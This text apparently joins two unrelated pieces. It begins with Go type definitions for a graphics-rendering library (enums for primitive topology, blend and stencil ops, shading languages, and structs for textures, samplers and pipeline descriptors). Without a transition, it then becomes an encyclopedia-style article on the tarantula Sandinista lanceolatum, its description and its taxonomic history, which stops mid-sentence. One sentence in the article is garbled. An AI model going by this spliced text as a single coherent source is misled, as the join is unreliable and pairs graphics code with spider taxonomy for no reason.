PrimitiveTopologyTriangleListAdjacency PrimitiveTopologyTriangleStripAdjacency PrimitiveTopologyPatches1 PrimitiveTopologyPatches2 PrimitiveTopologyPatches3 PrimitiveTopologyPatches4 PrimitiveTopologyPatches5 PrimitiveTopologyPatches6 PrimitiveTopologyPatches7 PrimitiveTopologyPatches8 PrimitiveTopologyPatches9 PrimitiveTopologyPatches10 PrimitiveTopologyPatches11 PrimitiveTopologyPatches12 PrimitiveTopologyPatches13 PrimitiveTopologyPatches14 PrimitiveTopologyPatches15 PrimitiveTopologyPatches16 PrimitiveTopologyPatches17 PrimitiveTopologyPatches18 PrimitiveTopologyPatches19 PrimitiveTopologyPatches20 PrimitiveTopologyPatches21 PrimitiveTopologyPatches22 PrimitiveTopologyPatches23 PrimitiveTopologyPatches24 PrimitiveTopologyPatches25 PrimitiveTopologyPatches26 PrimitiveTopologyPatches27 PrimitiveTopologyPatches28 PrimitiveTopologyPatches29 PrimitiveTopologyPatches30 PrimitiveTopologyPatches31 PrimitiveTopologyPatches32 ) type CompareOp int const ( CompareOpNeverPass CompareOp = iota CompareOpLess CompareOpEqual CompareOpLessEqual CompareOpGreater CompareOpNotEqual CompareOpGreaterEqual CompareOpAlwaysPass ) type StencilOp int const ( StencilOpKeep StencilOp = iota StencilOpZero StencilOpReplace StencilOpIncClamp StencilOpDecClamp StencilOpInvert StencilOpIncWrap StencilOpDecWrap ) type BlendOp int const ( BlendOpZero BlendOp = iota BlendOpOne BlendOpSrcColor BlendOpInvSrcColor BlendOpSrcAlpha BlendOpInvSrcAlpha BlendOpDstColor BlendOpInvDstColor BlendOpDstAlpha BlendOpInvDstAlpha BlendOpSrcAlphaSaturate BlendOpBlendFactor BlendOpInvBlendFactor BlendOpSrc1Color BlendOpInvSrc1Color BlendOpSrc1Alpha BlendOpInvSrc1Alpha ) type BlendArithmetic int const ( BlendArithmeticAdd BlendArithmetic = iota BlendArithmeticSubtract BlendArithmeticRevSubtract BlendArithmeticMin BlendArithmeticMax ) type PolygonMode int const ( PolygonModeFill PolygonMode = iota PolygonModeWireframe PolygonModePoints ) type CullMode int const ( CullModeDisabled CullMode = iota CullModeFront CullModeBack ) type LogicOp int const ( LogicOpDisabled LogicOp = iota LogicOpClear LogicOpSet LogicOpCopy LogicOpCopyInverted LogicOpNoOp LogicOpInvert LogicOpAND LogicOpANDReverse LogicOpANDInverted LogicOpNAND LogicOpOR LogicOpORReverse LogicOpORInverted LogicOpNOR LogicOpXOR LogicOpEquiv ) type TessellationPartition int const ( TessellationPartitionUndefined TessellationPartition = iota TessellationPartitionInteger TessellationPartitionPow2 TessellationPartitionFractionalOdd TessellationPartitionFractionalEven ) type QueryType int const ( QueryTypeSamplesPassed QueryType = iota QueryTypeAnySamplesPassed QueryTypeAnySamplesPassedConservative QueryTypeTimeElapsed QueryTypeStreamOutPrimitivesWritten QueryTypeStreamOutOverflow QueryTypePipelineStatistics ) type ErrorType int const ( ErrorTypeInvalidArgument ErrorType = iota ErrorTypeInvalidState ErrorTypeUnsupportedFeature ErrorTypeUndefinedBehavior ) type WarningType int const ( WarningTypeImproperArgument WarningType = iota WarningTypeImproperState WarningTypePointlessOperation WarningTypeVaryingBehavior ) type AttachmentLoadOp int const ( AttachmentLoadOpUndefined AttachmentLoadOp = iota AttachmentLoadOpLoad AttachmentLoadOpClear ) type AttachmentStoreOp int const ( AttachmentStoreOpUndefined AttachmentStoreOp = iota AttachmentStoreOpStore ) type ShadingLanguage int const ( ShadingLanguageGLSL ShadingLanguage = iota ShadingLanguageGLSL_110 ShadingLanguageGLSL_120 ShadingLanguageGLSL_130 ShadingLanguageGLSL_140 ShadingLanguageGLSL_150 ShadingLanguageGLSL_330 ShadingLanguageGLSL_400 ShadingLanguageGLSL_410 ShadingLanguageGLSL_420 ShadingLanguageGLSL_430 ShadingLanguageGLSL_440 ShadingLanguageGLSL_450 ShadingLanguageGLSL_460 ShadingLanguageESSL ShadingLanguageESSL_100 ShadingLanguageESSL_300 ShadingLanguageESSL_310 ShadingLanguageESSL_320 ShadingLanguageHLSL ShadingLanguageHLSL_2_0 ShadingLanguageHLSL_2_0a ShadingLanguageHLSL_2_0b ShadingLanguageHLSL_3_0 ShadingLanguageHLSL_4_0 ShadingLanguageHLSL_4_1 ShadingLanguageHLSL_5_0 ShadingLanguageHLSL_5_1 ShadingLanguageHLSL_6_0 ShadingLanguageHLSL_6_1 ShadingLanguageHLSL_6_2 ShadingLanguageHLSL_6_3 ShadingLanguageHLSL_6_4 ShadingLanguageHLSL_6_5 ShadingLanguageHLSL_6_6 ShadingLanguageHLSL_6_7 ShadingLanguageHLSL_6_8 ShadingLanguageMetal ShadingLanguageMetal_1_0 ShadingLanguageMetal_1_1 ShadingLanguageMetal_1_2 ShadingLanguageMetal_2_0 ShadingLanguageMetal_2_1 ShadingLanguageMetal_2_2 ShadingLanguageMetal_2_3 ShadingLanguageMetal_2_4 ShadingLanguageMetal_3_0 ShadingLanguageSPIRV ShadingLanguageSPIRV_100 ShadingLanguageVersionBitmask ) type ScreenOrigin int const ( ScreenOriginLowerLeft ScreenOrigin = iota ScreenOriginUpperLeft ) type ClippingRange int const ( ClippingRangeMinusOneToOne ClippingRange = iota ClippingRangeZeroToOne ) type CPUAccess int const ( CPUAccessReadOnly CPUAccess = iota CPUAccessWriteOnly CPUAccessWriteDiscard CPUAccessReadWrite ) type ResourceType int const ( ResourceTypeUndefined ResourceType = iota ResourceTypeBuffer ResourceTypeTexture ResourceTypeSampler ) type SamplerAddressMode int const ( SamplerAddressModeRepeat SamplerAddressMode = iota SamplerAddressModeMirror SamplerAddressModeClamp SamplerAddressModeBorder SamplerAddressModeMirrorOnce ) type SamplerFilter int const ( SamplerFilterNearest SamplerFilter = iota SamplerFilterLinear ) type ShaderType int const ( ShaderTypeUndefined ShaderType = iota ShaderTypeVertex ShaderTypeTessControl ShaderTypeTessEvaluation ShaderTypeGeometry ShaderTypeFragment ShaderTypeCompute ) type ShaderSourceType int const ( ShaderSourceTypeCodeString ShaderSourceType = iota ShaderSourceTypeCodeFile ShaderSourceTypeBinaryBuffer ShaderSourceTypeBinaryFile ) type StorageBufferType int const ( StorageBufferTypeUndefined StorageBufferType = iota StorageBufferTypeTypedBuffer StorageBufferTypeStructuredBuffer StorageBufferTypeByteAddressBuffer StorageBufferTypeRWTypedBuffer StorageBufferTypeRWStructuredBuffer StorageBufferTypeRWByteAddressBuffer StorageBufferTypeAppendStructuredBuffer StorageBufferTypeConsumeStructuredBuffer ) type SystemValue int const ( SystemValueUndefined SystemValue = iota SystemValueClipDistance SystemValueColor SystemValueCullDistance SystemValueDepth SystemValueDepthGreater SystemValueDepthLess SystemValueFrontFacing SystemValueInstanceID SystemValuePosition SystemValuePrimitiveID SystemValueRenderTargetIndex SystemValueSampleMask SystemValueSampleID SystemValueStencil SystemValueVertexID SystemValueViewportIndex ) type TextureType int const ( TextureTypeTexture1D TextureType = iota TextureTypeTexture2D TextureTypeTexture3D TextureTypeTextureCube TextureTypeTexture1DArray TextureTypeTexture2DArray TextureTypeTextureCubeArray TextureTypeTexture2DMS TextureTypeTexture2DMSArray ) type TextureSwizzle int const ( TextureSwizzleZero TextureSwizzle = iota TextureSwizzleOne TextureSwizzleRed TextureSwizzleGreen TextureSwizzleBlue TextureSwizzleAlpha ) /* ----- Flags ----- */ type CanvasFlags int const ( CanvasBorderless = (1 << 0) ) type CommandBufferFlags int const ( CommandBufferSecondary = (1 << 0) CommandBufferMultiSubmit = (1 << 1) CommandBufferImmediateSubmit = (1 << 2) ) type ClearFlags int const ( ClearColor = (1 << 0) ClearDepth = (1 << 1) ClearStencil = (1 << 2) ClearColorDepth = (ClearColor | ClearDepth) ClearDepthStencil = (ClearDepth | ClearStencil) ClearAll = (ClearColor | ClearDepth | ClearStencil) ) type FormatFlags int const ( FormatHasDepth = (1 << 0) FormatHasStencil = (1 << 1) FormatIsColorSpace_sRGB = (1 << 2) FormatIsCompressed = (1 << 3) FormatIsNormalized = (1 << 4) FormatIsInteger = (1 << 5) FormatIsUnsigned = (1 << 6) FormatIsPacked = (1 << 7) FormatSupportsRenderTarget = (1 << 8) FormatSupportsMips = (1 << 9) FormatSupportsGenerateMips = (1 << 10) FormatSupportsTexture1D = (1 << 11) FormatSupportsTexture2D = (1 << 12) FormatSupportsTexture3D = (1 << 13) FormatSupportsTextureCube = (1 << 14) FormatSupportsVertex = (1 << 15) FormatIsUnsignedInteger = (FormatIsUnsigned | FormatIsInteger) FormatHasDepthStencil = (FormatHasDepth | FormatHasStencil) ) type BarrierFlags int const ( BarrierStorageBuffer = (1 << 0) BarrierStorageTexture = (1 << 1) BarrierStorage = (BarrierStorageBuffer | BarrierStorageTexture) ) type ColorMaskFlags int const ( ColorMaskZero = 0 ColorMaskR = (1 << 0) ColorMaskG = (1 << 1) ColorMaskB = (1 << 2) ColorMaskA = (1 << 3) ColorMaskAll = (ColorMaskR | ColorMaskG | ColorMaskB | ColorMaskA) ) type RenderSystemFlags int const ( RenderSystemDebugDevice = (1 << 0) RenderSystemPreferNVIDIA = (1 << 1) RenderSystemPreferAMD = (1 << 2) RenderSystemPreferIntel = (1 << 3) ) type BindFlags int const ( BindVertexBuffer = (1 << 0) BindIndexBuffer = (1 << 1) BindConstantBuffer = (1 << 2) BindStreamOutputBuffer = (1 << 3) BindIndirectBuffer = (1 << 4) BindSampled = (1 << 5) BindStorage = (1 << 6) BindColorAttachment = (1 << 7) BindDepthStencilAttachment = (1 << 8) BindCombinedSampler = (1 << 9) BindCopySrc = (1 << 10) BindCopyDst = (1 << 11) ) type CPUAccessFlags int const ( CPUAccessRead = (1 << 0) CPUAccessWrite = (1 << 1) ) type MiscFlags int const ( MiscDynamicUsage = (1 << 0) MiscFixedSamples = (1 << 1) MiscGenerateMips = (1 << 2) MiscNoInitialData = (1 << 3) MiscAppend = (1 << 4) MiscCounter = (1 << 5) ) type ShaderCompileFlags int const ( ShaderCompileDebug = (1 << 0) ShaderCompileNoOptimization = (1 << 1) ShaderCompileOptimizationLevel1 = (1 << 2) ShaderCompileOptimizationLevel2 = (1 << 3) ShaderCompileOptimizationLevel3 = (1 << 4) ShaderCompileWarningsAreErrors = (1 << 5) ShaderCompilePatchClippingOrigin = (1 << 6) ShaderCompileSeparateShader = (1 << 7) ShaderCompileDefaultLibrary = (1 << 8) ) type StageFlags int const ( StageVertexStage = (1 << 0) StageTessControlStage = (1 << 1) StageTessEvaluationStage = (1 << 2) StageGeometryStage = (1 << 3) StageFragmentStage = (1 << 4) StageComputeStage = (1 << 5) StageAllTessStages = (StageTessControlStage | StageTessEvaluationStage) StageAllGraphicsStages = (StageVertexStage | StageAllTessStages | StageGeometryStage | StageFragmentStage) StageAllStages = (StageAllGraphicsStages | StageComputeStage) ) type ResizeBuffersFlags int const ( ResizeBuffersAdaptSurface = (1 << 0) ResizeBuffersFullscreenMode = (1 << 1) ResizeBuffersWindowedMode = (1 << 2) ) type WindowFlags int const ( WindowVisible = (1 << 0) WindowBorderless = (1 << 1) WindowResizable = (1 << 2) WindowCentered = (1 << 3) WindowAcceptDropFiles = (1 << 4) WindowDisableClearOnResize = (1 << 5) WindowDisableSizeScaling = (1 << 6) ) /* ----- Structures ----- */ type CanvasDescriptor struct { Title string Flags uint /* = 0 */ } type ClearValue struct { Color [4]float32 /* = {0.0,0.0,0.0,0.0} */ Depth float32 /* = 1.0 */ Stencil uint32 /* = 0 */ } type CommandBufferDescriptor struct { DebugName string /* = "" */ Flags uint /* = 0 */ NumNativeBuffers uint32 /* = 2 */ MinStagingPoolSize uint64 /* = (0xFFFF+1) */ RenderPass *RenderPass /* = nil */ } type DrawIndirectArguments struct { NumVertices uint32 NumInstances uint32 FirstVertex uint32 FirstInstance uint32 } type DrawIndexedIndirectArguments struct { NumIndices uint32 NumInstances uint32 FirstIndex uint32 VertexOffset int32 FirstInstance uint32 } type DrawPatchIndirectArguments struct { NumPatches uint32 NumInstances uint32 FirstPatch uint32 FirstInstance uint32 } type DispatchIndirectArguments struct { NumThreadGroups [3]uint32 } type BindingSlot struct { Index uint32 /* = 0 */ Set uint32 /* = 0 */ } type Viewport struct { X float32 /* = 0.0 */ Y float32 /* = 0.0 */ Width float32 /* = 0.0 */ Height float32 /* = 0.0 */ MinDepth float32 /* = 0.0 */ MaxDepth float32 /* = 1.0 */ } type Scissor struct { X int32 /* = 0 */ Y int32 /* = 0 */ Width int32 /* = 0 */ Height int32 /* = 0 */ } type DepthBiasDescriptor struct { ConstantFactor float32 /* = 0.0 */ SlopeFactor float32 /* = 0.0 */ Clamp float32 /* = 0.0 */ } type ComputePipelineDescriptor struct { DebugName string /* = "" */ PipelineLayout *PipelineLayout /* = nil */ ComputeShader *Shader /* = nil */ } type QueryPipelineStatistics struct { InputAssemblyVertices uint64 /* = 0 */ InputAssemblyPrimitives uint64 /* = 0 */ VertexShaderInvocations uint64 /* = 0 */ GeometryShaderInvocations uint64 /* = 0 */ GeometryShaderPrimitives uint64 /* = 0 */ ClippingInvocations uint64 /* = 0 */ ClippingPrimitives uint64 /* = 0 */ FragmentShaderInvocations uint64 /* = 0 */ TessControlShaderInvocations uint64 /* = 0 */ TessEvaluationShaderInvocations uint64 /* = 0 */ ComputeShaderInvocations uint64 /* = 0 */ } type ProfileTimeRecord struct { Annotation string /* = "" */ ElapsedTime uint64 /* = 0 */ } type ProfileCommandQueueRecord struct { BufferWrites uint32 /* = 0 */ BufferReads uint32 /* = 0 */ BufferMappings uint32 /* = 0 */ TextureWrites uint32 /* = 0 */ TextureReads uint32 /* = 0 */ CommandBufferSubmittions uint32 /* = 0 */ FenceSubmissions uint32 /* = 0 */ } type ProfileCommandBufferRecord struct { Encodings uint32 /* = 0 */ MipMapsGenerations uint32 /* = 0 */ VertexBufferBindings uint32 /* = 0 */ IndexBufferBindings uint32 /* = 0 */ ConstantBufferBindings uint32 /* = 0 */ SampledBufferBindings uint32 /* = 0 */ StorageBufferBindings uint32 /* = 0 */ SampledTextureBindings uint32 /* = 0 */ StorageTextureBindings uint32 /* = 0 */ SamplerBindings uint32 /* = 0 */ ResourceHeapBindings uint32 /* = 0 */ GraphicsPipelineBindings uint32 /* = 0 */ ComputePipelineBindings uint32 /* = 0 */ AttachmentClears uint32 /* = 0 */ BufferUpdates uint32 /* = 0 */ BufferCopies uint32 /* = 0 */ BufferFills uint32 /* = 0 */ TextureCopies uint32 /* = 0 */ RenderPassSections uint32 /* = 0 */ StreamOutputSections uint32 /* = 0 */ QuerySections uint32 /* = 0 */ RenderConditionSections uint32 /* = 0 */ DrawCommands uint32 /* = 0 */ DispatchCommands uint32 /* = 0 */ } type RendererInfo struct { RendererName string DeviceName string VendorName string ShadingLanguageName string ExtensionNames string /* = nil */ PipelineCacheID []byte /* = nil */ } type RenderingFeatures struct { HasRenderTargets bool /* = false */ Has3DTextures bool /* = false */ HasCubeTextures bool /* = false */ HasArrayTextures bool /* = false */ HasCubeArrayTextures bool /* = false */ HasMultiSampleTextures bool /* = false */ HasMultiSampleArrayTextures bool /* = false */ HasTextureViews bool /* = false */ HasTextureViewSwizzle bool /* = false */ HasTextureViewFormatSwizzle bool /* = false */ HasBufferViews bool /* = false */ HasSamplers bool /* LLGLRenderingFeatures.hasSamplers is deprecated since 0.04b; All backends must support sampler states either natively or emulated. */ HasConstantBuffers bool /* = false */ HasStorageBuffers bool /* = false */ HasUniforms bool /* LLGLRenderingFeatures.hasUniforms is deprecated since 0.04b; All backends must support uniforms either natively or emulated. */ HasGeometryShaders bool /* = false */ HasTessellationShaders bool /* = false */ HasTessellatorStage bool /* = false */ HasComputeShaders bool /* = false */ HasInstancing bool /* = false */ HasOffsetInstancing bool /* = false */ HasIndirectDrawing bool /* = false */ HasViewportArrays bool /* = false */ HasConservativeRasterization bool /* = false */ HasStreamOutputs bool /* = false */ HasLogicOp bool /* = false */ HasPipelineCaching bool /* = false */ HasPipelineStatistics bool /* = false */ HasRenderCondition bool /* = false */ } type RenderingLimits struct { LineWidthRange [2]float32 /* = {1.0,1.0} */ MaxTextureArrayLayers uint32 /* = 0 */ MaxColorAttachments uint32 /* = 0 */ MaxPatchVertices uint32 /* = 0 */ Max1DTextureSize uint32 /* = 0 */ Max2DTextureSize uint32 /* = 0 */ Max3DTextureSize uint32 /* = 0 */ MaxCubeTextureSize uint32 /* = 0 */ MaxAnisotropy uint32 /* = 0 */ MaxComputeShaderWorkGroups [3]uint32 /* = {0,0,0} */ MaxComputeShaderWorkGroupSize [3]uint32 /* = {0,0,0} */ MaxViewports uint32 /* = 0 */ MaxViewportSize [2]uint32 /* = {0,0} */ MaxBufferSize uint64 /* = 0 */ MaxConstantBufferSize uint64 /* = 0 */ MaxStreamOutputs uint32 /* = 0 */ MaxTessFactor uint32 /* = 0 */ MinConstantBufferAlignment uint64 /* = 0 */ MinSampledBufferAlignment uint64 /* = 0 */ MinStorageBufferAlignment uint64 /* = 0 */ MaxColorBufferSamples uint32 /* = 0 */ MaxDepthBufferSamples uint32 /* = 0 */ MaxStencilBufferSamples uint32 /* = 0 */ MaxNoAttachmentSamples uint32 /* = 0 */ } type ResourceHeapDescriptor struct { DebugName string /* = "" */ PipelineLayout *PipelineLayout /* = nil */ NumResourceViews uint32 /* = 0 */ BarrierFlags uint /* ResourceHeapDescriptor.barrierFlags is deprecated since 0.04b; Use PipelineLayoutDescriptor.barrierFlags instead! */ } type ShaderMacro struct { Name string /* = "" */ Definition string /* = "" */ } type TextureSubresource struct { BaseArrayLayer uint32 /* = 0 */ NumArrayLayers uint32 /* = 1 */ BaseMipLevel uint32 /* = 0 */ NumMipLevels uint32 /* = 1 */ } type SubresourceFootprint struct { Size uint64 /* = 0 */ RowAlignment uint32 /* = 0 */ RowSize uint32 /* = 0 */ RowStride uint32 /* = 0 */ LayerSize uint32 /* = 0 */ LayerStride uint32 /* = 0 */ } type Extent2D struct { Width uint32 /* = 0 */ Height uint32 /* = 0 */ } type Extent3D struct { Width uint32 /* = 0 */ Height uint32 /* = 0 */ Depth uint32 /* = 0 */ } type Offset2D struct { X int32 /* = 0 */ Y int32 /* = 0 */ } type Offset3D struct { X int32 /* = 0 */ Y int32 /* = 0 */ Z int32 /* = 0 */ } type BufferViewDescriptor struct { Format Format /* = FormatUndefined */ Offset uint64 /* = 0 */ Size uint64 /* = LLGL_WHOLE_SIZE */ } type AttachmentClear struct { Flags uint /* = 0 */ ColorAttachment uint32 /* = 0 */ ClearValue ClearValue } type DisplayMode struct { Resolution Extent2D RefreshRate uint32 /* = 0 */ } type FormatAttributes struct { BitSize uint16 BlockWidth uint8 BlockHeight uint8 Components uint8 Format ImageFormat DataType DataType Flags uint } type FragmentAttribute struct { Name string Format Format /* = FormatRGBA32Float */ Location uint32 /* = 0 */ SystemValue SystemValue /* = SystemValueUndefined */ } type ImageView struct { Format ImageFormat /* = ImageFormatRGBA */ DataType DataType /* = DataTypeUInt8 */ Data unsafe.Pointer /* = nil */ DataSize uintptr /* = 0 */ } type MutableImageView struct { Format ImageFormat /* = ImageFormatRGBA */ DataType DataType /* = DataTypeUInt8 */ Data unsafe.Pointer /* = nil */ DataSize uintptr /* = 0 */ } type BindingDescriptor struct { Name string Type ResourceType /* = ResourceTypeUndefined */ BindFlags uint /* = 0 */ StageFlags uint /* = 0 */ Slot BindingSlot ArraySize uint32 /* = 0 */ } type UniformDescriptor struct { Name string Type UniformType /* = UniformTypeUndefined */ ArraySize uint32 /* = 0 */ } type DepthDescriptor struct { TestEnabled bool /* = false */ WriteEnabled bool /* = false */ CompareOp CompareOp /* = CompareOpLess */ } type StencilFaceDescriptor struct { StencilFailOp StencilOp /* = StencilOpKeep */ DepthFailOp StencilOp /* = StencilOpKeep */ DepthPassOp StencilOp /* = StencilOpKeep */ CompareOp CompareOp /* = CompareOpLess */ ReadMask uint32 /* = ~0u */ WriteMask uint32 /* = ~0u */ Reference uint32 /* = 0u */ } type RasterizerDescriptor struct { PolygonMode PolygonMode /* = PolygonModeFill */ CullMode CullMode /* = CullModeDisabled */ DepthBias DepthBiasDescriptor FrontCCW bool /* = false */ DiscardEnabled bool /* = false */ DepthClampEnabled bool /* = false */ ScissorTestEnabled bool /* = false */ MultiSampleEnabled bool /* = false */ AntiAliasedLineEnabled bool /* = false */ ConservativeRasterization bool /* = false */ LineWidth float32 /* = 1.0 */ } type BlendTargetDescriptor struct { BlendEnabled bool /* = false */ SrcColor BlendOp /* = BlendOpSrcAlpha */ DstColor BlendOp /* = BlendOpInvSrcAlpha */ ColorArithmetic BlendArithmetic /* = BlendArithmeticAdd */ SrcAlpha BlendOp /* = BlendOpSrcAlpha */ DstAlpha BlendOp /* = BlendOpInvSrcAlpha */ AlphaArithmetic BlendArithmetic /* = BlendArithmeticAdd */ ColorMask uint8 /* = ColorMaskAll */ } type TessellationDescriptor struct { Partition TessellationPartition /* = TessellationPartitionUndefined */ MaxTessFactor uint32 /* = 64 */ OutputWindingCCW bool /* = false */ } type QueryHeapDescriptor struct { DebugName string /* = "" */ Type QueryType /* = QueryTypeSamplesPassed */ NumQueries uint32 /* = 1 */ RenderCondition bool /* = false */ } type FrameProfile struct { CommandQueueRecord ProfileCommandQueueRecord CommandBufferRecord ProfileCommandBufferRecord TimeRecords []ProfileTimeRecord /* = nil */ } type AttachmentFormatDescriptor struct { Format Format /* = FormatUndefined */ LoadOp AttachmentLoadOp /* = AttachmentLoadOpUndefined */ StoreOp AttachmentStoreOp /* = AttachmentStoreOpUndefined */ } type RenderSystemDescriptor struct { ModuleName string Flags uint /* = 0 */ Profiler unsafe.Pointer /* = nil */ Debugger *RenderingDebugger /* = nil */ RendererConfig unsafe.Pointer /* = nil */ RendererConfigSize uintptr /* = 0 */ NativeHandle unsafe.Pointer /* = nil */ NativeHandleSize uintptr /* = 0 */ } type RenderingCapabilities struct { ScreenOrigin ScreenOrigin /* = ScreenOriginUpperLeft */ ClippingRange ClippingRange /* = ClippingRangeZeroToOne */ ShadingLanguages []ShadingLanguage /* = nil */ TextureFormats []Format /* = nil */ Features RenderingFeatures Limits RenderingLimits } type AttachmentDescriptor struct { Format Format /* = FormatUndefined */ Texture *Texture /* = nil */ MipLevel uint32 /* = 0 */ ArrayLayer uint32 /* = 0 */ } type SamplerDescriptor struct { DebugName string /* = "" */ AddressModeU SamplerAddressMode /* = SamplerAddressModeRepeat */ AddressModeV SamplerAddressMode /* = SamplerAddressModeRepeat */ AddressModeW SamplerAddressMode /* = SamplerAddressModeRepeat */ MinFilter SamplerFilter /* = SamplerFilterLinear */ MagFilter SamplerFilter /* = SamplerFilterLinear */ MipMapFilter SamplerFilter /* = SamplerFilterLinear */ MipMapEnabled bool /* = true */ MipMapLODBias float32 /* = 0.0 */ MinLOD float32 /* = 0.0 */ MaxLOD float32 /* = 1000.0 */ MaxAnisotropy uint32 /* = 1 */ CompareEnabled bool /* = false */ CompareOp CompareOp /* = CompareOpLess */ BorderColor [4]float32 /* = {0.0,0.0,0.0,0.0} */ } type ComputeShaderAttributes struct { WorkGroupSize Extent3D /* = {1,1,1} */ } type SwapChainDescriptor struct { DebugName string /* = "" */ Resolution Extent2D ColorBits int /* = 32 */ DepthBits int /* = 24 */ StencilBits int /* = 8 */ Samples uint32 /* = 1 */ SwapBuffers uint32 /* = 2 */ Fullscreen bool /* = false */ } type TextureSwizzleRGBA struct { R TextureSwizzle /* = TextureSwizzleRed */ G TextureSwizzle /* = TextureSwizzleGreen */ B TextureSwizzle /* = TextureSwizzleBlue */ A TextureSwizzle /* = TextureSwizzleAlpha */ } type TextureLocation struct { Offset Offset3D ArrayLayer uint32 /* = 0 */ MipLevel uint32 /* = 0 */ } type TextureRegion struct { Subresource TextureSubresource Offset Offset3D Extent Extent3D } type TextureDescriptor struct { DebugName string /* = "" */ Type TextureType /* = TextureTypeTexture2D */ BindFlags uint /* = (BindSampled | BindColorAttachment) */ CPUAccessFlags uint /* = (CPUAccessRead | CPUAccessWrite) */ MiscFlags uint /* = (MiscFixedSamples | MiscGenerateMips) */ Format Format /* = FormatRGBA8UNorm */ Extent Extent3D /* = {1,1,1} */ ArrayLayers uint32 /* = 1 */ MipLevels uint32 /* = 0 */ Samples uint32 /* = 1 */ ClearValue ClearValue } type VertexAttribute struct { Name string Format Format /* = FormatRGBA32Float */ Location uint32 /* = 0 */ SemanticIndex uint32 /* = 0 */ SystemValue SystemValue /* = SystemValueUndefined */ Slot uint32 /* = 0 */ Offset uint32 /* = 0 */ Stride uint32 /* = 0 */ InstanceDivisor uint32 /* = 0 */ } type WindowDescriptor struct { Title string Position Offset2D Size Extent2D Flags uint /* = 0 */ WindowContext unsafe.Pointer /* = nil */ WindowContextSize uintptr /* = 0 */ } type BufferDescriptor struct { DebugName string /* = "" */ Size uint64 /* = 0 */ Stride uint32 /* = 0 */ Format Format /* = FormatUndefined */ BindFlags uint /* = 0 */ CPUAccessFlags uint /* = 0 */ MiscFlags uint /* = 0 */ VertexAttribs []VertexAttribute /* = nil */ } type StaticSamplerDescriptor struct { Name string StageFlags uint /* = 0 */ Slot BindingSlot Sampler SamplerDescriptor } type StencilDescriptor struct { TestEnabled bool /* = false */ ReferenceDynamic bool /* = false */ Front StencilFaceDescriptor Back StencilFaceDescriptor } type BlendDescriptor struct { AlphaToCoverageEnabled bool /* = false */ IndependentBlendEnabled bool /* = false */ SampleMask uint32 /* = ~0u */ LogicOp LogicOp /* = LogicOpDisabled */ BlendFactor [4]float32 /* = {0.0,0.0,0.0,0.0} */ BlendFactorDynamic bool /* = false */ Targets [8]BlendTargetDescriptor } type RenderPassDescriptor struct { DebugName string /* = "" */ ColorAttachments [8]AttachmentFormatDescriptor DepthAttachment AttachmentFormatDescriptor StencilAttachment AttachmentFormatDescriptor Samples uint32 /* = 1 */ } type RenderTargetDescriptor struct { DebugName string /* = "" */ RenderPass *RenderPass /* = nil */ Resolution Extent2D Samples uint32 /* = 1 */ ColorAttachments [8]AttachmentDescriptor ResolveAttachments [8]AttachmentDescriptor DepthStencilAttachment AttachmentDescriptor } type VertexShaderAttributes struct { InputAttribs []VertexAttribute /* = nil */ OutputAttribs []VertexAttribute /* = nil */ } type FragmentShaderAttributes struct { OutputAttribs []FragmentAttribute /* = nil */ } type ShaderResourceReflection struct { Binding BindingDescriptor ConstantBufferSize uint32 /* = 0 */ StorageBufferType StorageBufferType /* = StorageBufferTypeUndefined */ } type TextureViewDescriptor struct { Type TextureType /* = TextureTypeTexture2D */ Format Format /* = FormatRGBA8UNorm */ Subresource TextureSubresource Swizzle TextureSwizzleRGBA } type PipelineLayoutDescriptor struct { DebugName string /* = "" */ HeapBindings []BindingDescriptor /* = nil */ Bindings []BindingDescriptor /* = nil */ StaticSamplers []StaticSamplerDescriptor /* = nil */ Uniforms []UniformDescriptor /* = nil */ BarrierFlags uint /* = 0 */ } type GraphicsPipelineDescriptor struct { DebugName string /* = "" */ PipelineLayout *PipelineLayout /* = nil */ RenderPass *RenderPass /* = nil */ VertexShader *Shader /* = nil */ TessControlShader *Shader /* = nil */ TessEvaluationShader *Shader /* = nil */ GeometryShader *Shader /* = nil */ FragmentShader *Shader /* = nil */ IndexFormat Format /* = FormatUndefined */ PrimitiveTopology PrimitiveTopology /* = PrimitiveTopologyTriangleList */ Viewports []Viewport /* = nil */ Scissors []Scissor /* = nil */ Depth DepthDescriptor Stencil StencilDescriptor Rasterizer RasterizerDescriptor Blend BlendDescriptor Tessellation TessellationDescriptor } type ResourceViewDescriptor struct { Resource *Resource /* = nil */ TextureView TextureViewDescriptor BufferView BufferViewDescriptor InitialCount uint32 /* = 0 */ } type ShaderDescriptor struct { DebugName string /* = "" */ Type ShaderType /* = ShaderTypeUndefined */ Source string /* = "" */ SourceSize uintptr /* = 0 */ SourceType ShaderSourceType /* = ShaderSourceTypeCodeFile */ EntryPoint string /* = "" */ Profile string /* = "" */ Defines *ShaderMacro /* = nil */ Flags uint /* = 0 */ Name string /* ShaderDescriptor.name is deprecated since 0.04b; Use ShaderDescriptor.debugName instead! */ Vertex VertexShaderAttributes Fragment FragmentShaderAttributes Compute ComputeShaderAttributes } type ShaderReflection struct { Resources []ShaderResourceReflection /* = nil */ Uniforms []UniformDescriptor /* = nil */ Vertex VertexShaderAttributes Fragment FragmentShaderAttributes Compute ComputeShaderAttributes } /* ================================================================================ */ ```
Sandinista lanceolatum (synonyms include Aphonopelma lanceolatum and Brachypelma fossorium) is a species of spider in the family Theraphosidae (tarantulas), native to Nicaragua and Costa Rica. Description Sandinista lanceolatum is a relatively small spider compared to many other Central America tarantulas. For a pair of Costa Rican specimens, the author Carlos Valerio described a few select attributes such as cephalothorax less than 18 mm long: being 14 mm in his holotype male and 16 mm in the paratype female. Valerio also indicated that the fourth leg is the longest: 43 mm in the holotype male and 54 mm in the paratype female. The body and legs are covered with reddish brown hairs (setae). The "brush" of hairs (scopula) on the metatarsus of the fourth leg is short, limited to the distal third. The male's palpal bulb is less than 4 mm long; the spermatheca of the female is of slightly less width. Females have larger chelicerae than males. Such attributes are generally not considered as useful subsequent works, for example with males since shown to be highly variable, i.e. see Longhorn and Gabriel 2019. Taxonomy The taxonomic history of this species is somewhat tangled. As now understood, it was first described by Eugène Simon in 1891 as Eurypelma lanceolatum. Under this name it was transferred to the genus Aphonopelma as Aphonopelma lanceolatum in 1993. Separately, in 1980, Carlos Valerio described a species as Brachypelma fossoria, with the specific name referring to the "fossorial" or burrowing habits of the species. The specific name was amended to fossorium by Günter Schmidt in 1992, as Brachypelma is neuter in gender. In 2019, Stuart Longhorn and Ray Gabriel synonymized Brachypelma fossoria with Aphonopelma lanceolatum, and transferred the species to the new genus Sandinista. In 2020, Jorge Mendoza and Oscar Francke transferred Brachypelma fossoria to the genus Stichoplastoris, without recognizing the synonymy with Sandinista lanceolatum. , the 